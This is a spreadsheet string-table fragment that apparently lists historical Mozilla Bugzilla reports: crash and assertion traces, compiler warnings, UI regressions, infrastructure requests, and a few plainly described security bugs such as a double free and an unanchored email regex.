  <si>
    <t>CORE-343510</t>
  </si>
  <si>
    <t>Crash [@ nsComboboxControlFrame::Reflow] with select using display: absolute</t>
  </si>
  <si>
    <t>See upcoming testcase which crashes current trunk Mozilla builds. It doesn't crash Firefox1.5 builds so seems like a regression.
The testcase consists of this:
Talkback ID: TB20560549W
nsComboboxControlFrame::Reflow</t>
  </si>
  <si>
    <t>SEAMONKEY-432109</t>
  </si>
  <si>
    <t>nsSuiteGlue never removes observers</t>
  </si>
  <si>
    <t>When helping someone else with nsSuiteGlue observers I realized that the _dispose() function is never actually called and observers are never removed. I obviously deleted too much when porting this from Firefox.</t>
  </si>
  <si>
    <t>CORE-131727</t>
  </si>
  <si>
    <t>compiler warnings in nsDiskCacheBlockFile</t>
  </si>
  <si>
    <t>/home/timeless/mozilla/netwerk/cache/src/nsDiskCacheBlockFile.cpp:48: warning: size in array new must have integral type
/home/timeless/mozilla/netwerk/cache/src/nsDiskCacheBlockFile.cpp:38: warning: unused variable `enum PRStatus err'
Is there a good reason not to use const short kBitMapBytes = 4096 //?</t>
  </si>
  <si>
    <t>CORE-367650</t>
  </si>
  <si>
    <t>[FIX]ASSERTION: should only be called for text frames with counters :first-letter</t>
  </si>
  <si>
    <t>Created attachment 252209
testcase
Loading this testcase triggers the following assertion about 50% of the time:
###!!! ASSERTION: should only be called for text frames: 'Not Reached' file /Users/admin/trunk/mozilla/layout/generic/nsFrame.cpp line 3273</t>
  </si>
  <si>
    <t>FIREFOX-258827</t>
  </si>
  <si>
    <t>2004-09-10 installer build has wrong version number</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20040910 Firefox/0.10
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20040910 Firefox/0.10
The Win 32 installer build 20040910 gives a version number of 0.9.1+
Reproducible: Always
Steps to Reproduce:
1. Run installer on in blank directory space
2. Install normally
Actual Results:  
Theme with min version set at 0.10 will not be used: wrong version.
Useragent version number is 0.9.1+
Expected Results:  
Version 0.10--the theme should install
Workaround: delete installed directory. Unpacked a zipped build and rename to
MozillaFirefox.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-337664</t>
  </si>
  <si>
    <t>BrowserWrapper has redundant methods for getting current URI</t>
  </si>
  <si>
    <t>In some digging around trying to fix a couple other bugs this evening I noticed BrowserWrapper has two redundant methods for getting the current URI: |getCurrentURI| and |location|. Both return exactly the same thing: [mBrowserView currentURI].
We should probably fix the code to use one method or the other and remove the redundant method. It's not *hurting* anything but it's not making my job any easier either. :)</t>
  </si>
  <si>
    <t>SEAMONKEY-144957</t>
  </si>
  <si>
    <t>Convert EditorSaveAsCharset to rdfliner</t>
  </si>
  <si>
    <t>EditorSaveAsCharset currently enumerates the charsets from RDF and adds them
into the content of the tree. However the tree can enumerate the charsets itself
by adding the charsets as an RDF data source for the tree. This is a big perf win.
The otherwise unused treelist functions can also be removed from EdDialogCommon.js</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-383961</t>
  </si>
  <si>
    <t>[FIXr]Fix loadgroup mess in URILoader</t>
  </si>
  <si>
    <t>Instead of what we do now when looking for a loadgroup we should:
 if (!loadgroup) {
   // If no docloader in load cookie create one
   // Get loadgroup off docloader
 }
Not sure how best to handle channels with an existing loadgroup when !aChannelIsOpen.</t>
  </si>
  <si>
    <t>CORE-26238</t>
  </si>
  <si>
    <t>GETURL command that downloads an URL</t>
  </si>
  <si>
    <t>This is not a bug but a suggestion. The command line program GETURL should have 
an option to download not only binary data but ASCII as well.</t>
  </si>
  <si>
    <t>poursal</t>
  </si>
  <si>
    <t>CORE-314307</t>
  </si>
  <si>
    <t>[FIXr]###!!! ASSERTION: no last inline frame: 'PR_FALSE' file nsCSSFrameConstructor.cpp line 9142</t>
  </si>
  <si>
    <t>When viewing the attached testcase you get this assertion:
###!!! ASSERTION: no last inline frame: 'PR_FALSE' file h:/mozilla/tree-main/mo
zilla/layout/base/nsCSSFrameConstructor.cpp line 9142
Stacktrace:
nsDebugImpl::Assertion(nsDebugImpl * const 0x00268170 const char * 0x02113ae8 const char * 0x02113adc const char * 0x02113a98 int 9142) line 266
NSGlue_Assertion(const char * 0x02113ae8 const char * 0x02113adc const char * 0x02113a98 int 9142) line 107
nsCSSFrameConstructor::NeedSpecialFrameReframe(nsIContent * 0x03adbbc8 nsIContent * 0x03adbbc8 nsIFrame * &amp; 0x04536eb4 nsIContent * 0x03adbe68 int 2 nsIFrame * &amp; 0x04536fcc nsIFrame * 0x00000000) line 9142 + 35 bytes
nsCSSFrameConstructor::ContentInserted(nsIContent * 0x03adbbc8 nsIContent * 0x03adbe68 int 2 nsILayoutHistoryState * 0x036f6090 int 0) line 9391 + 51 bytes
nsCSSFrameConstructor::RecreateFramesForContent(nsIContent * 0x03adbe68) line 11645 + 39 bytes
nsCSSFrameConstructor::RestyleElement(nsIContent * 0x03adbe68 nsIFrame * 0x045370a0 nsChangeHint nsChangeHint_ReconstructFrame) line 10527
nsCSSFrameConstructor::ProcessOneRestyle(nsIContent * 0x03adbe68 nsReStyleHint eReStyle_Self nsChangeHint nsChangeHint_ReconstructFrame) line 13351
nsCSSFrameConstructor::ProcessPendingRestyles() line 13400
nsCSSFrameConstructor::RestyleEvent::HandleEvent() line 13460
HandleRestyleEvent(PLEvent * 0x035a9848) line 13469
PL_HandleEvent(PLEvent * 0x035a9848) line 688 + 10 bytes
PL_ProcessPendingEvents(PLEventQueue * 0x00ec2578) line 623 + 9 bytes
_md_EventReceiverProc(HWND__ * 0x002501e8 unsigned int 49401 unsigned int 0 long 15476088) line 1408 + 9 bytes
USER32! 77e3158f()
USER32! 77e31dc9()
USER32! 77e31e7e()
nsAppStartup::Run(nsAppStartup * const 0x02350d90) line 208
main1(int 1 char * * 0x00262638 nsISupports * 0x00ea1888) line 1248 + 32 bytes
main(int 1 char * * 0x00262638) line 1737 + 37 bytes
mainCRTStartup() line 338 + 17 bytes
KERNEL32! 77e98989()
BTW: When you remove a linebreak here or there in the testcase the assertion disappears. You need to do Shift+Reload to test it again so it does not ask the  cache (with cache you do not get the assertion).
This bug here might be a regression but i only have one other debug build to compare to (two month old) and there i do not see this assertion.</t>
  </si>
  <si>
    <t>CORE-446302</t>
  </si>
  <si>
    <t>missing parenthesis in jemalloc</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.8.1.15) Gecko/20080708 Firefox/2.0.0.15
Build Identifier: Firefox 3
jemalloc.c:5778
#  elif (defined(__GNU_C__)
crashes the build process. Maybe a missing parenthesis?
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>TOOLKIT-349299</t>
  </si>
  <si>
    <t>Latest trunk hourlies don't start up</t>
  </si>
  <si>
    <t>Regression between 1.9a1_2006081816 and 1.9a1_2006081822:
http://bonsai.mozilla.org/cvsquery.cgi?module=PhoenixTinderbox&amp;date=explicit&amp;mindate=2006-08-18+15%3A00&amp;maxdate=2006-08-18+23%3A00
It makes a new profile with a few files appears for a second in the task manager then it kills itself.</t>
  </si>
  <si>
    <t>CORE-519235</t>
  </si>
  <si>
    <t>Fix jsctypes unsigned __int64 conversion on windows</t>
  </si>
  <si>
    <t>See bug 513783 comment 54 and bug 513783 comment 55. We can specialize the templated jsvalToIntStrict() function for unsigned __int64 on windows.</t>
  </si>
  <si>
    <t>TESTING-705809</t>
  </si>
  <si>
    <t>Talos should not depend on scripts being run from the talos directory</t>
  </si>
  <si>
    <t>Currently Talos requires that run_test.py etc be run with the CWD
being the directory of the script.  This should be changed and instead
use paths relative to the script to use sibling resources.  As a
non-thorough examples list:
talos/bcontroller.py
+                       'xtalos\\start_xperf.py'
etc
=&gt;
os.path.join(here xtalos start...)
+++ b/talos/ffprocess.py
+        return [sys.executable 'bcontroller.py'
+                '--configFile' browser_config['bcontroller_config']]
=&gt;
os.path.join(here 'bcontrollery.py')
where `here = os.path.dirname(os.path.abspath(__file__))`</t>
  </si>
  <si>
    <t>CORE-213517</t>
  </si>
  <si>
    <t>Consider making x-user-defined an alias of windows-1252 for IE/Chrome/Safari compat</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4b) Gecko/20030516 Mozilla Firebird/0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4b) Gecko/20030516 Mozilla Firebird/0.6
This site uses a font to render Tamil script. But not all characters render
correctly. There are ? symbols at many places.
Reproducible: Always
Steps to Reproduce:
1. Go to the site.
2. Sometimes the homepage renders ok. Navigate deeper
Actual Results:  
Improper rendering. Unreadable text
Expected Results:  
Proper rendering.</t>
  </si>
  <si>
    <t>awernx</t>
  </si>
  <si>
    <t>NSS-165859</t>
  </si>
  <si>
    <t>Double free on error path in nssTrustDomain_FindCertificateByIssuerAndSerialNumber</t>
  </si>
  <si>
    <t>In trustdomain.c function
nssTrustDomain_FindCertificateByIssuerAndSerialNumber
'collection' may be destroyed twice if the
nssPKIObjectCollection_GetCertificates call fails.
Here is the code fragment:
    if (collection) {
        (void)nssPKIObjectCollection_GetCertificates(collection
        nssPKIObjectCollection_Destroy(collection)
        if (!rvCert) {
            goto loser
        }
    }
    nssSlotArray_Destroy(slots)
    return rvCert
loser:
    if (collection) {
        nssPKIObjectCollection_Destroy(collection)
    }
    if (slots) {
        nssSlotArray_Destroy(slots)
    }
    return (NSSCertificate *)NULL</t>
  </si>
  <si>
    <t>CORE-376064</t>
  </si>
  <si>
    <t>Back button doesn't work after document.open()</t>
  </si>
  <si>
    <t>Created attachment 260202
testcase (see steps in comment 0)
Steps to reproduce:
1. Load the testcase.
2. Click the Home button.
3. Click the Back button.
Result: Nothing happens when I click the Back button even if I click it multiple times.
The testcase comes from bug 326621.
I'm testing with a Mac trunk debug build.  I don't see any assertions or JavaScript errors related to this bug.</t>
  </si>
  <si>
    <t>CORE-38016</t>
  </si>
  <si>
    <t xml:space="preserve"> or  breaks pasting as plaintext</t>
  </si>
  <si>
    <t>M16 linux 2000-050215
if text contains the signs  or  (or equivalent plaintext) it's
impossible to copy beyond them. Text gets selected but when you paste it
it's cut off.</t>
  </si>
  <si>
    <t>FIREFOX-325782</t>
  </si>
  <si>
    <t>Open context options non functional in places bar folders</t>
  </si>
  <si>
    <t>The open options in the context menu for bookmarks in subfolders of the places bar are always greyed out though they work for bookmarks at the top level of the places bar.
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060203 Firefox/1.6a1 ID:2006020309</t>
  </si>
  <si>
    <t>BUGZILLA-162313</t>
  </si>
  <si>
    <t>possible security issue with useregexps</t>
  </si>
  <si>
    <t>Groups have userregexps for the defaults to use for new users. This is overkill
(bug 162331) but its also a security hole.
Given a userregexp of |.*@foo.com| I can match that with an address of
bbaetz@foo.com.my.server.com.au. This is because there isn't any ^ or $ wrapping
in InsertNewUser.
What are bmo's regexps set to? :) landfill's are buggy this way....
This could arguably be called a error on the part of the admin but since we
don't give any examples.... ^ wrapping is probably going to break stuff but $
shouldn't. Alternately we can just have checksetup prepent ^.* and append $
and then update the help text so that admins can see what went wrong.
I tested this locally by modifying /etc/hosts to make 127.0.0.1 an alias for
bluemartini.com.localhost and it worked.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-209356</t>
  </si>
  <si>
    <t>Loading personal certificates</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.4) Gecko/20030529
Build Identifier: Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.4) Gecko/20030529
In Mozilla 1.3 (os.2) I could apply for a free digital certificate successfully.
(eg Thawtes) but with Mozilla V1.4 when I apply for a new free certificate the
following error appears
NB This was *Not* a problem with V1.3
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Expected Results:  
loaded my free digitial certificate into my  security/ certificates area</t>
  </si>
  <si>
    <t>gn</t>
  </si>
  <si>
    <t>FIREFOX-228320</t>
  </si>
  <si>
    <t>When any sidebar is active a 5-pixel spacer appears on the left of all popups</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6b) Gecko/20031130 Firebird/0.7+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6b) Gecko/20031130 Firebird/0.7+
When a sidebar (such as bookmarks or history) is active any popup windows
display a 5-pixel gray spacer on the left side of the pop-up page where a
sidebar would normally be.
Reproducible: Always
Steps to Reproduce:
1. Activate bookmarks
2. Restart Firebird
3. Go to a site that opens a popup window
Actual Results:  
A spacer is displayed on the left side of the popup window.  This is better than
the old behavior of displaying the whole sidebar but it shouldn't be displaying
anything.
Expected Results:  
Nothing should be displayed (hit CTL-B in the popup for the spacer to disappear
- this is how it should always look)</t>
  </si>
  <si>
    <t>jjongsma79</t>
  </si>
  <si>
    <t>CORE-92093</t>
  </si>
  <si>
    <t>Tooltips unreliable with  element</t>
  </si>
  <si>
    <t>When I use an  element in a tooltip the text shows up always for the
first time but then after that it is completely unreliable.
I will attach one xul file as a test case for this.
I am using Mozilla 2001071608 under Linux.
cc: to Mike Shaver because he's the one who gave us the idea on how to set HTML
text dynamically.</t>
  </si>
  <si>
    <t>CORE-167040</t>
  </si>
  <si>
    <t>CTL: caret does not move to next/prev line on text area</t>
  </si>
  <si>
    <t>With ctl enable build caret does not move to
next/prev line on Text Area e.g. mail composer.</t>
  </si>
  <si>
    <t>MARKETING-285782</t>
  </si>
  <si>
    <t>Use of the SeaMonkey name in a site URL and title.</t>
  </si>
  <si>
    <t>I would like to request information concerning the term SeaMonkey. It does not
appear to be registered as a trademark in the USPTO databases but I would like
to make sure that by using the name in a URL and the title of a site that could
potentially be popular I am not derivating from any official mandate from The
Mozilla Foundation concerning the use of the aforementioned term. Thanks.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-246738</t>
  </si>
  <si>
    <t>Confirm remove all cookies</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040517 Camino/0.8b
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040517 Camino/0.8b
Twice now while selectively deleting some cookies in the Cookie Manager I have
inadvertantly clicked Remove All instead of Remove. A confirmation dialogue
when clicking Remove All would prevent these accidents. Also adding a Check
Box as in Mozilla to Not Allow Sites That Set Removed Cookies To Set Future
Cookies would also be a very useful enhancement.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>joelcraig23</t>
  </si>
  <si>
    <t>FIREFOX-352320</t>
  </si>
  <si>
    <t>need a third state for tab scroll right / left:  enabled but not hovered</t>
  </si>
  <si>
    <t>need a third state for tab scroll right / left:  enabled but not hovered
due to bug #352315 we need a third state for scroll right / left:  we
have disabled and we have hovered but we need a third state to be used when
the scroll right /left buttons are enabled but not hovered.  these images
should match with a non-hovered tab (from tomorrow's build.)</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-162472</t>
  </si>
  <si>
    <t>Accented text copied in Chimera doesn't paste correctly in another application</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:1.0.0) Gecko/20020812
BuildID:    20022081205
In Chimera I found some pb with accents in french when copying a text from a
page to Entourage or Word : Ã© goes Ã‰ and so on with all letters like Ã  Ã© Ã§...
(Using Arial default font)
Reproducible: Always
Steps to Reproduce:
1. I go on a web page
2. I copy a the text
3. I paste it in an other application</t>
  </si>
  <si>
    <t>ender21</t>
  </si>
  <si>
    <t>CORE-518663</t>
  </si>
  <si>
    <t>ES5: Object.getOwnPropertyNames</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-515297</t>
  </si>
  <si>
    <t>Stage mozillaservice.org disable shared auth for Facebook testing</t>
  </si>
  <si>
    <t>Please disable the shared username / password on 
http://mozillaservice.stage.mozilla.com/
Please re-enable after 24 hours.
This is to allow testing of the Facebook Connect app.
Thanks.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-510231</t>
  </si>
  <si>
    <t>prod socorro db update execute SQL</t>
  </si>
  <si>
    <t>Please execute:
INSERT INTO branches (product version branch) VALUES ('Firefox' '3.0.12' '1.9')
INSERT INTO branches (product version branch) VALUES ('Firefox' '3.0.13' '1.9')
This will add 3.0.12 and 3.0.13 into the search form.</t>
  </si>
  <si>
    <t>NSS-265373</t>
  </si>
  <si>
    <t>compiler warnings in pki3hack on Solaris AMD64</t>
  </si>
  <si>
    <t>pki3hack.c line 102: warning: implicit function declaration: NSSRWLock_LockWrite
pki3hack.c line 104: warning: implicit function declaration:
NSSRWLock_UnlockWrite
pki3hack.c line 1045: warning: implicit function declaration: NSSRWLock_LockRead
pki3hack.c line 1049: warning: implicit function declaration:
NSSRWLock_UnlockRead
The fix is to include nssrwlk.h  and already checked in on the tip.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-502686</t>
  </si>
  <si>
    <t>Ship emacs instead of xemacs</t>
  </si>
  <si>
    <t>Ship emacs instead of xemacs:
* C-Backspace works yay!
* you can use it directly in a console: emacs.exe --no-window-system
* It matches the emacs keystrokes I think most people are used to: M-g g for goto-line for example
http://ftp.gnu.org/gnu/emacs/windows/ has the ZIP files which are easy as pie to unzip anywhere.
When this happens a couple of the init files which currently mention xemacs should mention emacs instead. I'd suggest that the default EDITOR should be 'emacs.exe --no-window-system'.</t>
  </si>
  <si>
    <t>CORE-422825</t>
  </si>
  <si>
    <t>uninitialized memory-read in XPCWrapper::AddProperty</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #420585 +++
The if (!isXOW) sequence in XPCWrapper::AddProperty() seems to allow a situation where |v| is used in OBJ_DEFINE_PROPERTY uninitialized.  I am hitting this case while using firebug 1.2 with a recent nightly build.
This patch may be wrong.  Shouldn't we init as *vp?  mrbkap suggested JSVAL_VOID on IRC and I have used that to continue my work but I'm not sure what is more correct.
I'm also not sure how to architect a testcase that hits this issue.  Filing as security-sensitive for now though I'm very sure this is a trunk-only (and recent at that) bug.</t>
  </si>
  <si>
    <t>CORE-324738</t>
  </si>
  <si>
    <t>Remove nsIParser::RegisterDTD and related code</t>
  </si>
  <si>
    <t>nsIParser::RegisterDTD causes the parser to do a dance every time we want to parse a web page. Nobody in Gecko actually uses these facilities and anybody else trying to would be stymied by the assumptions that the code makes anyway. I have a patch to remove it and move on with parser simplification.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-287687</t>
  </si>
  <si>
    <t>ChatZilla should not hardcode Mozilla as the suite name</t>
  </si>
  <si>
    <t>Instead of using the hardcoded word Mozilla as the brand name of the suite
ChatZilla can run in it should use the  entity from brand.dtd
(or the brandShortName string from brand.poperties).
That way it's easier for the new suite project to rebrand the suite (see bug
285696) as well as for some distributor to change to his brand.
Where it can't be avoided a hardcoded change or inclusion of the new suite name
(tba) might be a good idea (see reasonable hardcoding in list below).
(I'm marking this blocking suite-rebranding though it's no hard blocker on that
bug esp. as calendar isn't part of the default build)
Here's a list of affected files/locale strings:
chatzilla.properties: msg.dcc.not.possible (reasonable hardcoding)
chatzilla.properties: msg.err.offline (reasonable hardcoding)
chatzilla.properties: cmd.cmd-mozilla-prefs.label
chatzilla.properties: cmd.exit-mozilla.help
chatzilla.properties: cmd.quit-mozilla.help</t>
  </si>
  <si>
    <t>BUGZILLA-314269</t>
  </si>
  <si>
    <t>add email pref to not send mail about dependency changes.</t>
  </si>
  <si>
    <t>Now that we have the new email_setting table it's time to add more settings.  This one is for adding a setting about dependency tree changes.  I've actually already done this myself so I'll be taking this and appending a patch shortly.
Todd</t>
  </si>
  <si>
    <t>CORE-330129</t>
  </si>
  <si>
    <t>Add 'Telugu' langgroup</t>
  </si>
  <si>
    <t>In bug 237434 comment #14 I wrote :
&gt; didn't add Kanada Telugu and so forth because I couldn't find fonts for them
&gt; that cover Basic Latin completely. 
I got an email from Nagarjuna Venna  as following:
&gt; to the language list because you couldn't find a font that covers
&gt; basic Latin. However there are a bunch of Telugu fonts that I
&gt; understand satisfy this requirement - for example you can try the two
&gt; fonts that are available at http://www.kavya-nandanam.com/dload.htm.
&gt; (The font Microsoft ships with Windows XP called Gautami also
&gt; satisfies this criterion). We would really like this feature to be
&gt; implemented for Telugu - it's starting to become a pain in evangelism
&gt; efforts.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-218083</t>
  </si>
  <si>
    <t>irc.mozilla.org allows too few concurrent connections per IP address</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4) Gecko/20030624
irc.mozilla.org is rejecting additional connections from 63.67.108.16
h-63-67-108-18.bluemartini.com. We have a number of people here (about ten or
fifteen) who use the mozilla.org servers and all of us are translated to that
single external address. 
Please raise the limit of concurrent connections per IP address to allow for
heavily NATted organizations.
Thanks!
Reproducible: Always
Steps to Reproduce:
1. Operate NAT infrastructure on company site
2. Create multiple concurrent connections to irc.mozilla.org
3. View error message below
Actual Results:  
*** Connecting to port 6667 of server irc.mozilla.org
*** *** Looking up your hostname...
*** *** Checking Ident
*** *** No Ident response
*** *** Found your hostname
*** PASS: Not enough parameters
*** Closing Link: h-63-67-108-16.bluemartini.com (No more connections allowed on
that IP)
*** Disconnected from irc.mozilla.org.</t>
  </si>
  <si>
    <t>mjg</t>
  </si>
  <si>
    <t>CORE-65784</t>
  </si>
  <si>
    <t>[ps] All Chinese characters are printed as little squares</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux 2.2.16-22 i686 en-US 0.7) Gecko/20010105
BuildID:    2001010517
All Chinese pages are not printed correctly. This happens at both Chinese web
page and Chinese mail although the navigator/mail displayed Chinese correctly
they only printed little squares for all Chinese characters. If user chose
Print to File and use ghostview to check the postscript file it has same
problem.
Reproducible: Always
Steps to Reproduce:
1. Go to any Chinese page (such as http://gbchinese.yahoo.com)
2. Print the page
3. Check the printout.
Actual Results:  The problem is re-produced.
Expected Results:  Mozilla should print Chinese characters as it display on screen.
This problem also happened on all older version of Mozilla/Netscape (for Linux)</t>
  </si>
  <si>
    <t>LiBruno</t>
  </si>
  <si>
    <t>CORE-415299</t>
  </si>
  <si>
    <t>Support string values for ARIA widgets</t>
  </si>
  <si>
    <t>Sliders may have strings instead of numbers for the value points. For example the screen resolution slider in Windows (800x600 1600x1200 etc.) the security slider in IE (high medium low off etc.)
Here's a real example:
http://www.thosedamntwins.com/ARIA/domain/DomainSlider.html 
The problem is the the accessible value interface only supports numbers.
Another place we'll eventually have this problem is for axes on a diagram or chart.
We're going to need some new ARIA property to expose this so we'll have to recommend that soon for ARIA 1.0.
Event data won't work because 1) we don't have it in IA2 and 2) it does not allow you to get the info unless the value actually changed.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-331331</t>
  </si>
  <si>
    <t>Change popup blocker's color</t>
  </si>
  <si>
    <t>Since no bug was filed for this I'm filing this one. I'll try to do something constructive and come up with a few proposals.</t>
  </si>
  <si>
    <t>CORE-432062</t>
  </si>
  <si>
    <t>Windows vector font rendering is broken</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9pre) Gecko/2008042609 SeaMonkey/2.0a1pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9pre) Gecko/2008050311 Minefield/3.0pre
Recent changes have cause the vector fonts supplied with Windows to be displayed with the characters compressed together.   Fortunately these fonts aren't used too often but IE and Opera get them right!
Reproducible: Always
Steps to Reproduce:
1. Display test case test_fonts_2.html with recent minefield.
Actual Results:  
See attachment ff3_bug_0.png lines 10 and 11.
Expected Results:  
See attached screen-shot sm0426.png from Seamonkey 26 May 08 tinderbox.  (Current tinderbox Seamonkey is now broken just like Firefox.)
This change appears to have taken place with recent tweaks to fix Type 1 printing and other font problems?  (Type 1 printing is still broken!)</t>
  </si>
  <si>
    <t>tkloos</t>
  </si>
  <si>
    <t>CORE-267225</t>
  </si>
  <si>
    <t>text in textarea is not displayed until after window.onload</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.3) Gecko/20041028 Firefox/1.0RC1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.3) Gecko/20041028 Firefox/1.0RC1
When you go to the above webpage you need to respond the alert before seeing
the contents of the textarea showing that the textarea isn't filled until after
window.onload. In IE the textarea is filled before window.onload.
Reproducible: Always
Steps to Reproduce:
1. Go to page
2. Notice the lack of text in the textarea when the alert pops up
Actual Results:  
There is no text in the textarea.
Expected Results:  
There should have been text in the textarea.</t>
  </si>
  <si>
    <t>CORE-482258</t>
  </si>
  <si>
    <t>ARIA controls with STATE_MIXED must not have STATE_CHECKED set also</t>
  </si>
  <si>
    <t>Right now ARIA controls with aria-checked=mixed get STATE_CHECKED set. This was uncovered in fix for bug 477975 through the change in nsAccessible::GetActionName where uncheck would be exposed on something that was only aria-checked=mixed.</t>
  </si>
  <si>
    <t>CORE-163815</t>
  </si>
  <si>
    <t>Accessibility code using nsCOMPtr with frames</t>
  </si>
  <si>
    <t>Don't know if this would cause any problems or not but I'm getting runtime
warnings in debug builds about it.</t>
  </si>
  <si>
    <t>TOOLKIT-257218</t>
  </si>
  <si>
    <t>toolkit form and autocomplete code leaks mork rows</t>
  </si>
  <si>
    <t>A bunch of code leaks mork rows.  I noticed one of the sites with the following
steps:
 * load firefox
 * type in search bar
 * hit enter
 * exit
and the rest by inspection.</t>
  </si>
  <si>
    <t>CORE-171830</t>
  </si>
  <si>
    <t>[FIX]Don't use nsCSSPropList hints for inline style changes</t>
  </si>
  <si>
    <t>I'll attach a patch tomorrow if my floppy drive cooperates and I find my
floppies.  The basic idea of the patch is as follows:
1)  Add AttributeWillChange to nsIDocumentObserver
2)  Cache the old style data in nsCSSFrameConstructor::AttributeWillChange
3)  Compare the old to the new in nsCSSFrameConstructor::AttributeChanged
The current setup passes the cached data out as an nsISupports then gets it
passed back in.  I talked to jst and he does not like that very much.. I'll be
attaching the patch with that setup as-is (because it pretty much works) and
I'll also attach the conversation he and I had.
I'll work on posting some testcases for testing as well.</t>
  </si>
  <si>
    <t>SOCORRO-424952</t>
  </si>
  <si>
    <t>Queries can be too slow for stack searches</t>
  </si>
  <si>
    <t>This seems to vary pretty wildly but mostly when I am searchng through the topcrashers looking at particular stacks etc. it can take minutes for socorro to respond with results. I can literally go make a cup of tea while I am waiting for my data to arrive.</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-933898</t>
  </si>
  <si>
    <t>Gaia::Camera</t>
  </si>
  <si>
    <t>[Camera] 1.3 Visual refresh of Heads Up Display (flash and front/rear toggle buttons)</t>
  </si>
  <si>
    <t>Add functionality for toggling between flash modes:
Flash: On Flash: Off Flash: Auto
User Story:
Media 64
As a user I like to see flash (on off auto) as a camera setting.
Version 0.5 Camera Spec:
https://app.box.com/files/0/f/1211601585/1/f_11402480095</t>
  </si>
  <si>
    <t>wilsonpage</t>
  </si>
  <si>
    <t>pla</t>
  </si>
  <si>
    <t>MOZILLA.ORG-453118</t>
  </si>
  <si>
    <t xml:space="preserve">CVS Account Request - Alexander Sack </t>
  </si>
  <si>
    <t>Created attachment 336331
SSH pub key
Hi
for the distros EOL branch maintenance work (1.8.0 and later most likely 1.8) I need access to CVS to take off the load from caillon.
I provided my contributors form during summit.
Attaching my ssh key. If possible I would like to provide a second key. Let me know if thats (not-)possible.</t>
  </si>
  <si>
    <t>asac</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-882506</t>
  </si>
  <si>
    <t>Remove useless nsBrowserAccess in shell.js</t>
  </si>
  <si>
    <t>SEAMONKEY-469385</t>
  </si>
  <si>
    <t>Clicking on Help button in either of Server Settings Syncing &amp; Disk Space Disk Space panels in Account Manager does not do anything</t>
  </si>
  <si>
    <t>To reproduce:
1. Open Account Manager in MailNews
2. Open Server Settings panel of a POP3 account
3. Click on Help button
Results:
Nothing happens.
Looks like regression from Bug 453908. The patch there removed the getServerIdAndPageIdFromTree function used by http://hg.mozilla.org/comm-central/annotate/315ac410eb2b/mailnews/base/prefs/resources/content/am-help.js#l106</t>
  </si>
  <si>
    <t>CORE-436635</t>
  </si>
  <si>
    <t>Menus do not update their layout when their direction is changed</t>
  </si>
  <si>
    <t>Created attachment 323185
demonstration of the problem
When a menu item's direction is changed (LTR-&gt;RTL or vice-versa) the menu item's layout does not change (i.e. the .menu-left element still remains laid out on the left instead of moving to the right).
* If a menu has not been opened prior to the direction change there is no problem.  This is only a problem if the menu item has already been laid out prior to the change.
* In some cases such as the opening of a submenu the layout gets updated and the problem corrects itself for that particular item.</t>
  </si>
  <si>
    <t>kliu</t>
  </si>
  <si>
    <t>CORE-378540</t>
  </si>
  <si>
    <t>Bad results for GetTextAtOffset with word boundaries</t>
  </si>
  <si>
    <t>Steps:
1. Go to http://www.mozilla.org/access/qa/jstest.html
2. Select Word Start or Word End
3. Click on some words and check the results -- the boundaries are not correctly computed</t>
  </si>
  <si>
    <t>THUNDERBIRD-505309</t>
  </si>
  <si>
    <t>os search integration should use nsIMsgDatabase::getFilterEnumerator to avoid creating a lot of js garbage nsMsgHdrs</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #505307 +++
